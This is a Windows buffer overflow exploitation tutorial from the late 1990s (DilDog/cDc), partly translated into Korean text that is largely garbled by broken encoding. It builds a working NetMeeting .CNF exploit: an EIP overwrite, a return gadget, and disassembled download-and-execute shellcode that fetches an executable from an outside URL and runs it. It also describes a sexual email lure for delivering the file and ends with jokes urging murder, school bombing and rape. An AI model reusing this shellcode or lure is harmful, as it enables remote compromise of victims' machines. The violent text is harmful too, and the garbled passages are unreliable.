;============================================================================; .-. _ _ .-. / \ .-. ((___)) .-. / \ /.ooM \ / \ .-. [ x x ] .-. / \ /.ooM \ -/-------\-------/-----\-----/---\--\ /--/---\-----/-----\-------/-------\- /lucky 13\ / \ / `-(' ')-' \ / \ /lucky 13\ \ / `-' (U) `-' \ / `-' `-' The Tao of Windows Buffer Overflow as taught by DilDog cDc Ninja Strike Force 9-dan of the Architecture Sensei of the Undocumented Opcode Begin ;============================================================================; @ Essence Throughout these ages our operating systems infested by bugs The ignorant world turns to Windows for safety Safety from themselves It is now the time for the world to realize that we all feel pain Introduction Back ;============================================================================; @ Introduction Windows 95, 98, NT OS Buffer Overflow ̿ Exploitingϴ ϰ ִ. Ʒ Ͽ ξ ̴. Intel x86 Assembly, preferably Pentium General Windows System Architechture (you should know what the PE means in the PE-Executable) Know what a URL is. Have a working knowledge of C ׸, ̷ ʿ ̴. A good hex editor/assembler/disassembler, such as HIEW A realtime debugger, such as SoftICE A few tools that come with Visual C++, DUMPBIN specifically. ׷ ⺻ ƺ. Fundamentals Introduction ;============================================================================; @ Fundamentals buffer overflow  ڸ 𰡰 ġϰ Ͼ. ũ ū ڷḦ ڷ ũ⸦ üũ ʴ´ٸ ۰ ġ ޸ κ ʰ ٲ ̴. . void func(void) { int i; char buffer[256]; // * for(i=0;i<512;i++) buffer[i]='A'; // ! return; } ڵ忡 ֵ, ۴ 256 A ä. ׷ ڵ i 512 ۴ٸ ۿ A ä쵵 Ǿִ. ׷ A 򰡷 ä ̴. bound checking ʾұ ۸ ä A ؼ ޸ 򰡿 ä Ǵ ̴. ׸ Windows 9x/NT OS Ϲ 32-bit stack ׸̴. ڵ * ũ ִ κ̴. STACK ---------------- Local Variables ESP-> i Buffer ---------------- EBP-> Old Value of EBP ---------------- Return Address ---------------- func ν , EBP ESP ư 巹 POPѴ. ڵ ! κ ۸ ġ ؼ Old Value of EBP Return Address 'A' Ѵ. 巹 overwriteν, 츮 α׷ 帧 ٲ ִ. 츮 ؾ 巹 츮 ϱ ϴ ޸ ġ Ű ٲٱ⸸ ϸ Ǵ ̴. ׷ ν , 츮 ϴ ڵ尡 ̴. ۸ ڵ Ʈ äٸ, Ű Windows 9x/NT OS executable memory ֵDZ EIP ų ִ. ⺻ . 丸 ´ٸ ̰͸ε ϴٰ Ѵ. Next Back ;============================================================================; @ What It Looks Like ;--------------------------------------------------------------; ; Rundll32 ; ; This program has performed an illegal operation ; and will be shut down ; If the problem persists, contact the program ; vendor ; ; RUNDLL32 caused an invalid page fault in ; module at 00de:80808080. ; Registers: ; EAX=8160bb68 CS=014f EIP=80808080 EFLGS=00010246 ; EBX=0063ff68 SS=0157 ESP=005400d8 EBP=005400f8 ; ECX=00540180 DS=0157 ESI=005401c4 FS=1337 ; EDX=bff76648 ES=0157 EDI=005401a8 GS=0000 ; Bytes at CS:EIP: ;--------------------------------------------------------------; ̷ Ҵٸ, ÷ο찡 Ͼ ̴. и Ϲ δ. ڼ . ޽ microsoft netmeeting α׷ speeddial shortcut address field 0x80 ־ ̴. ׷, EIP 0x80808080 Ǿ ִ ִ. ٷ ÷ο찡 Ͼ ̴. 츮 ؾ RET 츮 ϴ ڵ带 Ű ϴ ͽ÷ ڵ带 ϰ ̴. ⼭ ¤ Ѿ ִ. 츮  ϸ鼭 ޽ ϰ ȴ. , ۿ÷ο쿡 ƴ ̴. ׸, 95/98/NT OS ÷ο ׵ ߿ ̽ ÷ο쿡 õ ׸ ٷ ̴. Hack me up! Back me up! ;============================================================================; @ How Can This Be Used? 츮 ۾  . ÷ο Ȳ "overflow.cnf" ̴. CNF ̶ Microsoft Netmeeting 'SpeedDial' shortcut ̴. CNF Ϲ øų ̸Ͽ ÷Ͽ ν call ϰ Ѵ. ͽ÷Ϸ, cnf Ͽ ÷Ͽ victim ȴ. "My girlfriend and I want you to watch us fuck while you spank it! Call us soon, we're horny!" Ȥ ̴. victim cnf Ŭ ̰, ݹ ǰ ILS server ϴ ó ÷ο찡 Ͼ ͽ ̴. , . ÷ο 'RUNDLL32.EXE' Ͼ. ׷, 'RUNDLL32.EXE' 95 NT װ  ٸ. ̰ 츮 95 NT import table ٸٴ ִ. ѹ DUMPBIN Ȯ . ׷, Ư ÷ο 95 Ͼ. NT ͽ÷ ȿϴ. ƹư ݹ 2.1̰, 98 OS ȯ濡 ۾ ̴. Onward! Backward! ;============================================================================; @ The Good And The Bad ũ Ͼ 'close'ư ݹ ʴ ִ. ̰ RUNDLL32 и μ ǹѴ. ̰ ִ. ٷ ڵ尡 ʴٴ Ͱ ݹ ʱ ǽ ʴ´ٴ ̴. RUNDLL32 DLL̳ ܺ ҽ ε ʱ 츮 ʿ ϴ ͵ εؾ Ѵٴ ̴. RUNDLL32.exe 0x00400000 base address . ̰ ϴ ȿ  ϳ NULLڸ ٴ ̴. ϰԵ ̰ ÷ο ߱ϴ C ׻ ؾ string̴. ׷Ƿ 츮 츮 ڵ忡 null ڸ ְ ȴٸ, 츮 exploit ϸ鼭 츮 exploit ڵ ߷ 츮 exploit ش. ٸ bad character鿡 ǵ, ij , Ʈ ڵ, ش 쿣 ҹ Ȥ 빮 Ȥ 0x80 ̻ ASCII ڵ( ־ ̴.) ִ. 츮 ؾ Ǵٸ MSCONF.DLL εǾٴ ̴. ̰ RUNDLL32 MSCONF.DLL εϱ ̴. ̴ .CNF ϴ Ŀǵ .CNF Ÿ ȿ "rundll32.exe msconf.dll,OpenConfLink %l" ǵǾ ִ ִ. 츮 KERNEL32 Լ RUNDLL32 import table ƮǾ ֱ KERNEL32.DLL εǾٰ ִ. KERNEL32 Լ MSCONF.DLL import table ƮǾ ִ. ⼭ 츮 Ϸ ϴ ͵ õ Ϸ ͵ . 츰 ݹ2.1 ŷϰ ִ. ǰ ̴. ׸ MSCONF.DLL̴. ׷ پ ׷̵ OS ε RUNDLL32 KERNEL32  ִ. ׷Ƿ 츮 ޸ ּҸ Ϸ Ѵٸ, 츰 ٸ ¤ ̴. 츮 Ÿ OS 츮 exploit ۵ϱ Ѵٸ ̴ и ̴. ׷ 츰 ٸ α׷  ׵ ּҸ 캸ƾ Ѵ. 츰 츮 exploit ڵ ִ غ ͳ ֱ⸦ ϱ , WSOCK32.DLL Ȥ WININET.DLL ʿ䰡 ̴. WinInet ڵ ϱ 츰 װ ̿ ̴. WININET RUNDLL32 μ ε ʾұ 츰 װ εؾ߸ Ѵ. ׷ ȭ EIP 츮 ڵ带 Ű ϴ Ϳ ¤ . Snatch that EIP! Back up! ;============================================================================; @ Snatching the EIP 츮 ̸ ˾ƾ 巹 츮 ڵ ִ ̴. . Address=.....256periods....1234xyz  256bytes̱ (츰 װ 迡 ˾Ҵ. ũ Ű Ȯ ڼ 'address=' ̸ õõ øų ̴ .) ڿ ۸ 256 period ä ̴. ׸ EBP 0x34333231  ̸, ڿ null ڷ EIP 0x00ZZYYXX Ʈ ̴. ̰ ÿ 츮 ϴ κ ų ְ ϴ ̴.  쿣 ̰ Ѵ.  쿣 ۰ ʹ ۾ ̰ ʰų ִ 𰡸 . , 巹 ڿ 츮 ڵ带 ִ ̵̴. : Address=.....256periods....1234wxyzOURCODEFOLLOWSHERE>>> 츮 ؾ 츮 ڵ带 巹 ڿ ִ ̴. 츮 0xZZYYXXWW ν ۾ ̴. 0xZZYYXXWW 츮 ϴ ̴. Ÿ Ÿ ϰ ũ Ű ͽ÷ Ʈ ־. ߸ 巹 ߴٰ 𰡰 Ÿ ̴.( , 0xZZYYXXWW 0x34333231 Ʈغ. ޸𸮻 װ ƹ ڵ嵵  instant page fault Ų.) ϰ ŷ . ͽ÷տ 츮 ESP 츮 ͽ÷ ڵ ó 򰡸 Ű Ͷ ִ. װ 츮 saved EBP ġ 16bytes Ų. . 츰 Ȯ Ϸ ϴ°? 츰 stack ϰ ʹ. ESP ϴ ϴ. ̷ ϱ 0xZZYYXXWW "jmp esp" "call esp" ޸𸮻 ڵ带 Ű ϸ ȴ. ׷ Ư 0x00 "bad byte" ־ ȴ. 츰 츮 ڵ带 MSCONF.DLL ã ִ. 0x6A600000, offset 2A76 ε ڵ: .00002A76: 54 push esp .00002A77: 2404 and al,004 .00002A79: 33C0 xor eax,eax .00002A7B: 8A0A mov cl,[edx] .00002A7D: 84C9 test cl,cl .00002A7F: 740F je .000002A90 .00002A81: 80E930 sub cl,030 ;"0" .00002A84: 8D0480 lea eax,[eax][eax]*4 .00002A87: 0FB6C9 movzx ecx,cl .00002A8A: 42 inc edx .00002A8B: 8D0441 lea eax,[ecx][eax]*2 .00002A8E: EBEB jmps .000002A7B .00002A90: C20400 retn 00004 ڵ esp ϴ ƴϴ. ̰ ESP Ѵ. PUSH ESP ߻ϰ, jmps 2A7B ߻ϰ, ׸ JE 2A90 츮 RET popѴ. ̰ 츮 ȿ ESP ϰ Ѵ. MSCONF.DLL εǾ, 츮 ؾ MSCONF.DLL ̰ װ DLL ̽ 巹 츮 ׻ ҿ ڵ尡 ϸ ִ. ׷ 츮 0xZZYYXXWW 0x6A602A76 ̴. null bad character . 츰 EIP ë. μ 츮 ̴. ִ 𰡸 ʴ.. Ooh! Exploit! Back it up, I missed something. ;============================================================================; @ Constructing the Exploit 츰 ӽ Ʈ ְ Ǿ. ִ 𰡸 . ׷ 츰 츮 ڵ ̿ ޴´. 츰 763 characters ڿ Ǵٸ ҿ ũ Ͼ ؾ Ѵ. , ٸ ҿ ٸ ÷ο찡 Ͼ ̴. MS ΰ Ƚ ؾ Ѵ. , ⼱ ϳ 츸 exploiting ̴. ó 256 chars 츮 ڵ带 500bytes̴.(763bytes-256bytes(periods)=507bytes) : 500 byte maximum exploit length (ְ 500 Ʈ ͽ÷ ) We don't know what OS version we're running ( OS 𸥴) We don't know where any useful functions are located ( Լ ġ 𸥴) ٷο ̴. ⼭ ͽ÷ ƴ ð . "" Ǿ . ϵ ̴. Win95 WinNT Ѵٿ ȴ. ExitProcess ȣϱ Լ ִ  ΰ? ExitProcess OS Kernel32.DLL ٸ ġ ġѴ.(׸ Win95 OSR1 OSR2, WinNT پ  ٸ) 巹 ۿ . 츮 ̷ Լ ġ ϰ Ѿ Ѵ. Win32 API "GetProcAddress" Լ ִ. װ ̸ ڵ Լ ޸ ּҸ ȯѴ. ׷ GetProcAddress ּҴ ΰ? 𸥴. 츰 װ ã װ ȣؾ ̴. ׷  ۵ϴ°? ٷ Import tables̴. Import tables OS 츮  Լ ġ ְ ̺ ä PE-Executable format ̴. import table DUMPBIN ̿. DLL EXE Ѵ import table . 츰 MSCONF.DLL ޸𸮿 ְ, ϳ ȴ. GetProcAddress MSCONF.DLL import table ִٸ, MSCONF.DLL εǾ OS MSCONF.DLL ̺ ġ GetProcAddress ּҰ . װ ϸ: Microsoft (R) COFF Binary File Dumper Version 5.10.7303 Copyright (C) Microsoft Corp 1992-1997. All rights reserved. Dump of file msconf.dll File Type: DLL Section contains the following imports: KERNEL32.dll 23F Sleep 183 IsBadReadPtr 17E InterlockedIncrement . . . 1E CompareStringA 98 FreeLibrary 116 GetProcAddress 190 LoadLibraryA 4C DeleteCriticalSection 51 DisableThreadLibraryCalls . . . ƴ! GetProcAddress, ׸ LoadLibraryA ִ! LoadLibrary ε DLL ڵ µ ִ. ׸ ε DLL εϴµ δ. װ ⺻ DLL base address ȯѴ. ̰ NT 95 KERNEL32.DLL base address ٸ ߿ϴ. ׷ 츰 Ÿ ϰ Լ ּҸ ã ޸𸮸 ˻Ѵ. װ͵ 0x6A60107C(LoadLibraryA) 0x6A601078(GetProcAddress)̴. 츰 ǥ(call dword ptr [0x6A60107C]) ġ鸦 ȣϸ ȴ. ׷ 츰 ùٸ ҷ ̴. ȿ ϱ , 츮 ͽ÷ κ ̴. 츮 Ϸ Լ jumptable , 츮 jumptable ϴ ڵ带 Ѵ. ̰ ʿ Լ ȣ⿡ ʿ ڵ ̰, ͸ Ƴ ּȭ Ѵ. ̰ 츮 ʹ PUSH POP ϸ 츮 ڵ带 ų ٸ ߱ ̱ ߿ϴ. jumptable , 츰 츮 ȣ Win32 Լ ʿ䰡 ִ. ׷ 츮 ϰ ˾ƾ Ѵ. 500 bytes α׷ ʹ ۴. ſ 츰 ͳ Ͽ 츮 egg code ٸ α׷( ũ ) ٿεϰ ϰ ̴. ̷ 츮 ڵ ٸ ڵ带 ϰ ϴ ϰ Ѵ. URL ٿεϱ , 츮 WININET.DLL InternetOpenA, InternetCloseHandle, InternetOpenUrlA, InternetReadFile ʿ Ѵ. 츰 ٿε ũ KERNEL32.DLL _lcreat, _lwrite, _lclose ʿ Ѵ. 츰 ٿε ޸𸮸 Ҵ KERNEL32.DLL GlobalAlloc ʿϴ. ٿε ϰ, 츮 ũ RUNDLL32 μ ̱ KERNEL32.DLL WinExec ExitProcess ʿϴ. Ϲ Win32 α׷ _lcreat Լ ȣ ʴ´. ׷ Win95 NT Ѵ. ׸ װ͵ CreateFile Լ ȣ . ׷ 츰 װ͵ ̴. Show me the code! What's an EIP again? ;============================================================================; @ Creating our Jumptable jumptable . ֹ #1: 츮 Լ ̸ ؾ Ѵ. ׷. GetProcAddress Լ ( ٲ 츮 .)̳ Լ ̸(NULL ڷ Լ ̸) ȣѴ. 츮 ͽ÷ Ʈ null ڸ Ѵٰ? . 츰 ̸ װͿ ߾ ߴ. 츰 ٿε URL Ʈ ־ ̴. ٽ ѹ Ӹ Ѵ. 츮 Լ ̸̳ ٿε URL  ڵ ASCII 0x80 ̻̾ ϱ , ̸ ͽ÷ Ʈ URL 𰡸 ̴ ϴ. ׷ Ʈ Ʈ XOR(Ȥ ADD) 0x80 ض. ׸ 츮 ͽ÷ , 츰 츮 ͽ÷ κ 0x80 XORѴ. ̰ ͽ÷ Ʈ ϴ 츮 Ϸ Ȯ ġç ִ ִ. ȣȭ ƴ, װ Ʈ̴. 츰 _۵_ϰ ϸ ȴ. ׷ 츰 ͽ÷ Ʈ ̺ δ: 00000270: .. .. .. .. .. .. .. 4B-45 52 4E 45-4C 33 32 00 KERNEL32 00000280: 5F 6C 63 72-65 61 74 00-5F 6C 77 72-69 74 65 00 _lcreat _lwrite 00000290: 5F 6C 63 6C-6F 73 65 00-57 69 6E 45-78 65 63 00 _lclose WinExec 000002A0: 45 78 69 74-50 72 6F 63-65 73 73 00-47 6C 6F 62 ExitProcess Glob 000002B0: 61 6C 41 6C-6C 6F 63 00-57 49 4E 49-4E 45 54 00 alAlloc WININET 000002C0: 49 6E 74 65-72 6E 65 74-4F 70 65 6E-41 00 49 6E InternetOpenA In 000002D0: 74 65 72 6E-65 74 43 6C-6F 73 65 48-61 6E 64 6C ternetCloseHandl 000002E0: 65 00 49 6E-74 65 72 6E-65 74 4F 70-65 6E 55 72 e InternetOpenUr 000002F0: 6C 41 00 49-6E 74 65 72-6E 65 74 52-65 61 64 46 lA InternetReadF 00000300: 69 6C 65 00-68 74 74 70-3A 2F 2F 77-77 77 2E 6C ile http://www.l 00000310: 30 70 68 74-2E 63 6F 6D-2F 7E 64 69-6C 64 6F 67 0pht.com/~dildog 00000320: 2F 65 61 74-6D 65 2E 65-78 65 00 .. .. .. .. .. /eatme.exe 00 bytes ֱ 0x80 XORϸ : 00000270: .. .. .. .. .. .. .. CB-C5 D2 CE C5-CC B3 B2 80 -+-++_? 00000280: DF EC E3 F2-E5 E1 F4 80-DF EC F7 F2-E9 F4 E5 80 __?_??______? 00000290: DF EC E3 EC-EF F3 E5 80-D7 E9 EE C5-F8 E5 E3 80 __?___?__+? 000002A0: C5 F8 E9 F4-D0 F2 EF E3-E5 F3 F3 80-C7 EC EF E2 +?_-__?_____ 000002B0: E1 EC C1 EC-EC EF E3 80-D7 C9 CE C9-CE C5 D4 80 ?-___+++++++? 000002C0: C9 EE F4 E5-F2 EE E5 F4-CF F0 E5 EE-C1 80 C9 EE +_______-___-?_ 000002D0: F4 E5 F2 EE-E5 F4 C3 EC-EF F3 E5 C8-E1 EE E4 EC ______+____+?__ 000002E0: E5 80 C9 EE-F4 E5 F2 EE-E5 F4 CF F0-E5 EE D5 F2 _?_______-___+_ 000002F0: EC C1 80 C9-EE F4 E5 F2-EE E5 F4 D2-E5 E1 E4 C6 _-?_______-_?? 00000300: E9 EC E5 80-E8 F4 F4 F0-BA AF AF F7-F7 F7 AE EC ___?___?__? 00000310: B0 F0 E8 F4-AE E3 EF ED-AF FE E4 E9-EC E4 EF E7 ______?______ 00000320: AF E5 E1 F4-ED E5 AE E5-F8 E5 80 .. .. .. .. .. ??__ ˾Ҵ°? . ֹ #2: 츰 Ʈ ̺ ڵؾ Ѵ. 츮 ù° ӹ ȣ ص̴. ׷ 츰 ó ̰ ǰ ؾ Ѵ.: 00000146: 33C9 xor ecx,ecx ECX ŬѴ. 츰 ̰ ̿ ̴. 00000148: B88053FF63 mov eax,063FF5380 ;"c_S? 0000014D: 2C80 sub al,080 ;"? 0000014F: C1C018 rol eax,018 ޸𸮿 츮 κ EAX Ѵ.(츰 ̷ ؼ  NULL ڵ ʰ ȴ.) 00000152: B1B4 mov cl,0B4 ;"? ECX 츮 XORϱ ϴ 0x000000B4̴. 00000154: 48 dec eax 00000155: 803080 xor b,[eax],080 ;"? 00000158: E2FA loop 000000154 ---------- (1) κ XOR ̴. 츰 ޸ XORߴ ִ. EAX Ų. ׸ 츰 ̸ ϱ װ ִ. 츮 jumptable ۾ غ. ֹ #3: ν ּҸ εϱ 0000015A: BE7C10606A mov esi,06A60107C 0000015F: 50 push eax 00000160: 50 push eax 00000161: FF16 call d,[esi] 00000163: 8BF0 mov esi,eax ڵ LoadModule ȣѴ. ι push ʿ . ׷, ̾ װ ִ ߴ. ϸ NOP ص ȴ. EAX LoadModule ù° "KERNEL32"̶ Ʈ Ų. LoadModule , װ 츮 EAX ߴ Ŀ ڵ ESI put ̴. ׷, װ ٸ ν ȣν ̴. 00000165: 5B pop ebx 00000166: 8BFB mov edi,ebx 00000168: 6681EF4BFF sub di,0FF4B ;"_K" ̰ EDI ( Ʒ ) 츮 ڵ Ʈ ̺ ۺκ 181 byte ġϴ 츮 jumptable base Ű Ѵ. 0000016D: FC cld 0000016E: 33C9 xor ecx,ecx 00000170: 80E9FA sub cl,-006 츮 kernel 6 ν ȣϱ 6 ̴. ׷ ECX=0x00000006̴. 00000173: 43 inc ebx 00000174: 32C0 xor al,al 00000176: D7 xlat 00000177: 84C0 test al,al 00000179: 75F8 jne 000000173 ---------- (1) 0000017B: 43 inc ebx null ڸ ã (, Ʈ Ѿ) ؽƮ ĵѴ. ׸, 0x00 byte ڸ EBX Ų. ̰ ϳ ν Űش. XLAT 31337(elite, ) ؼ . װ Ѵ. one byte 츮 ޸ ִ. 0000017C: 51 push ecx 0000017D: 53 push ebx 0000017E: 56 push esi 0000017F: FF157810606A call d,[06A601078] 00000185: AB stosd 00000186: 59 pop ecx ̰ 츮 Լ ν ּҸ ´. ׸ EDI Ʈ ̺ װ͵ ġŲ. 00000187: E2EA loop 000000173 ---------- (2) kernel ν Ѵ. kernel . 츮 WININET ν ݺؾ Ѵ. 00000189: 43 inc ebx 0000018A: 32C0 xor al,al 0000018C: D7 xlat 0000018D: 84C0 test al,al 0000018F: 75F8 jne 000000189 ---------- (2) 00000191: 43 inc ebx ڵ EBX kernel ̸ 츮 ڵ Ʈ ̺ "WININET" Ʈ Բ ϱ ̴. 00000192: 53 push ebx 00000193: 53 push ebx 00000194: FF157C10606A call d,[06A60107C] 0000019A: 8BF0 mov esi,eax 0000019C: 90 nop 0000019D: 90 nop 0000019E: 90 nop 0000019F: 90 nop NOP̳ double-push ̴. ϸ ϶. ڵ WININET.DLL ڵ(base address) ´. ׸ װ ESI Ѵ. 000001A0: 33C9 xor ecx,ecx 000001A2: 83E9FC sub ecx,-004 000001A5: 43 inc ebx 000001A6: 32C0 xor al,al 000001A8: D7 xlat 000001A9: 84C0 test al,al 000001AB: 75F8 jne 0000001A5 000001AD: 43 inc ebx 000001AE: 51 push ecx 000001AF: 53 push ebx 000001B0: 56 push esi 000001B1: FF157810606A call d,[06A601078] 000001B7: AB stosd 000001B8: 59 pop ecx 000001B9: E2EA loop 0000001A5 ̰ Ŀ Լ ּҸ Ϳ ڵ ī̴. ׷ ̹ 4 WININET Լ ּҸ ̴. ̰ ι ʱ ٶ. . 츰 jumptable . EDI ̺ dword Ų. ׷ 츰 EDI 츮 ν ִ(call dword ptr [edi-16]). װ import table ϴ. ׷ ִ. 츰 츮 ߴ. 츮 ڵ带 ͵ ƴϴ. Where's the 0x0000BEEF? This makes no sense. I hate you. ;============================================================================; @ The Shit 츮 ñ Ϸ ߾ ʴ. : 000001BB: 90 nop 000001BC: 90 nop 000001BD: 33C0 xor eax,eax 000001BF: 6648 dec ax 000001C1: D1E0 shl eax,1 000001C3: 33D2 xor edx,edx 000001C5: 50 push eax 000001C6: 52 push edx 000001C7: FF57EC call d,[edi][-0014] 000001CA: 8BF0 mov esi,eax ڵ ޸𸮿 131070bytes ҴѴ. EAX 131070 , 츰 EDI -0x14 bytes jumptable ּ GlobalAlloc ȣѴ. ̰ ESI ޸ ּҸ Ѵ. GlobalAlloc Ÿ GMEM_FIXED (0) ε, ڵ麸 ϵ ޸ ּҸ ߱Ѵ. 000001CC: 33D2 xor edx,edx 000001CE: 52 push edx 000001CF: 52 push edx 000001D0: 52 push edx 000001D1: 52 push edx 000001D2: 57 push edi 000001D3: FF57F0 call d,[edi][-0010] ׷, InternetOpenA ȣ ͳ ڵ . InternetOpenA Ķʹ 쿡 zero̴. ׷ 츰 . ͳ ڵ EAX ȯǰ 츮 츮 ȣ Լ Ķͷμ װ ̴... 000001D6: 33D2 xor edx,edx 000001D8: 52 push edx 000001D9: 52 push edx 000001DA: 52 push edx 000001DB: 90 nop 000001DC: 52 push edx 000001DD: 8BD7 mov edx,edi 000001DF: 83EA50 sub edx,050 ;"P" 000001E2: 90 nop 000001E3: 90 nop 000001E4: 90 nop 000001E5: 52 push edx 000001E6: 50 push eax 000001E7: FF57F8 call d,[edi][-0008] ڵ 츮 õ URL ȣ InternetOpenUrlA (at [EDI-0x08]) ȣ . URL Ÿ ڵ忡 ʾұ HTTP,FTP,FILE,GOPHER ̶ ִ. 000001EA: 57 push edi 000001EB: 33D2 xor edx,edx 000001ED: 664A dec dx 000001EF: D1E2 shl edx,1 000001F1: 52 push edx 000001F2: 56 push esi 000001F3: 50 push eax 000001F4: FF57FC call d,[edi][-0004] ڵ 츮 ޸ (ESI pointer) 131070 bytes ٿεϱ InternetReadFile (at [EDI-0x04) Ѵ. 츮 EDI Ǫߴ ϶. EDI 츮 󸶳 Ʈ (count) о Ϸ ̴. ̰ ũ ùٸ ϱ ʿϴ. ٿε ִ ͽ÷ ũ⿡ Ѱ谡 ִٴ ϶. 000001F7: 90 nop 000001F8: 90 nop 000001F9: 90 nop 000001FA: 33D2 xor edx,edx 000001FC: 52 push edx 000001FD: 8BD7 mov edx,edi 000001FF: 83EA30 sub edx,030 ;"0" 00000202: 42 inc edx 00000203: 90 nop 00000204: 90 nop 00000205: 52 push edx 00000206: FF57D8 call d,[edi][-0028] ̰ 츮 ޸ ۿ ϱ _lcreat (at [edi-0x28]) ȣѴ. ͸ ð̴. ̸ url 5ڷ õȴ. 쿡 "e.exe"̴. ͽ÷ ġ (Ϲ ݹ SpeedDial 丮) ̴. 00000209: FF37 push d,[edi] 0000020B: 56 push esi 0000020C: 50 push eax 0000020D: 8BD8 mov ebx,eax 0000020F: FF57DC call d,[edi][-0024] ũ _lwrite (at [edi-0x24]) ȣѴ. Ʈ Ķʹ [edi] ġϰ ȴ. 츰 ġ _lcreat ϵ ڵ ǪѴ. 츮 Լ ȣϱ , 츰 _lwrite EBX ڵ Ѵ. 00000212: 53 push ebx 00000213: FF57E0 call d,[edi][-0020] ׸ 츮 ۾ Ϸϱ ڵ ݴ´. ٿε ϰ, μ ̴. 츰 ޸ Ҵ óؾ ̴. δ. ׷ ִ. 00000216: 90 nop 00000217: 90 nop 00000218: 90 nop 00000219: 33D2 xor edx,edx 0000021B: 42 inc edx 0000021C: 52 push edx 0000021D: 8BD7 mov edx,edi 0000021F: 83EA30 sub edx,030 ;"0" 00000222: 42 inc edx 00000223: 90 nop 00000224: 90 nop 00000225: 52 push edx 00000226: FF57E4 call d,[edi][-001C] . 츰 WinExec ϶ ϱ⸸ ϸ ȴ. 'inc edx' "Show Window" mode Ѵٴ ϶. 'hidden' mode DZ Ѵٸ nop ϸ ȴ. ׷ WinExec κ° Ķͷμ SW_SHOWNORMAL SW_HIDE ̴. WinExec ù° Ķʹ ̸̴. ϶! 00000229: 90 nop 0000022A: 90 nop 0000022B: 90 nop 0000022C: FF57E8 call d,[edi][-0018] 츰 μ ĥ ð̴. ExitProcess 츮 ̴. ׸ . Awwww yeah that felt good. Take me back. ;============================================================================; @ That's it! This code that I have explained can be used as an overflow egg for any Windows 95 or NT program. It is theorized to work in a Windows 98 environment. The example Netmeeting 2.1 exploit that I used throughout this explanation is a Win95 only flaw, but for other operating systems, the code, and technology remains the same. The Netmeeting flaw is not patched as of this writing, but expect it to be fixed sometime. Learn. Experience. And send me all of your money. Now you can start ruling the world. Have fun with this knowledge. Rob from the rich, and rob from the poor. Eat your cat. Kill your parents. Blow up your local elementary school. Rape young farm animals. Do whatever your sick and twisted mind can fathom. And when you get caught, just tell 'em Satan made you do it. Oh yeah, and I almost forgot. Here's the whole toy put together. Take me to the top. I want to read those haikus again. Take me back. ;============================================================================; DilDog "The Tao of Windows Buffer Overflow" Դϴ. htmlε, textϷ Ͽϴ. ϴ ִ DilDog ǵ ݿϷ Ͽ, DilDog Ư ְ ؼϴ ǵ ĥ ֱ ؼ ʾҽϴ. ׸, ÷Ͽ Ͻñ ٶϴ. ۱ 츮 ο ֽϴ. , , ϼŵ ˴ϴ. __sucked by dufqks ;============================================================================;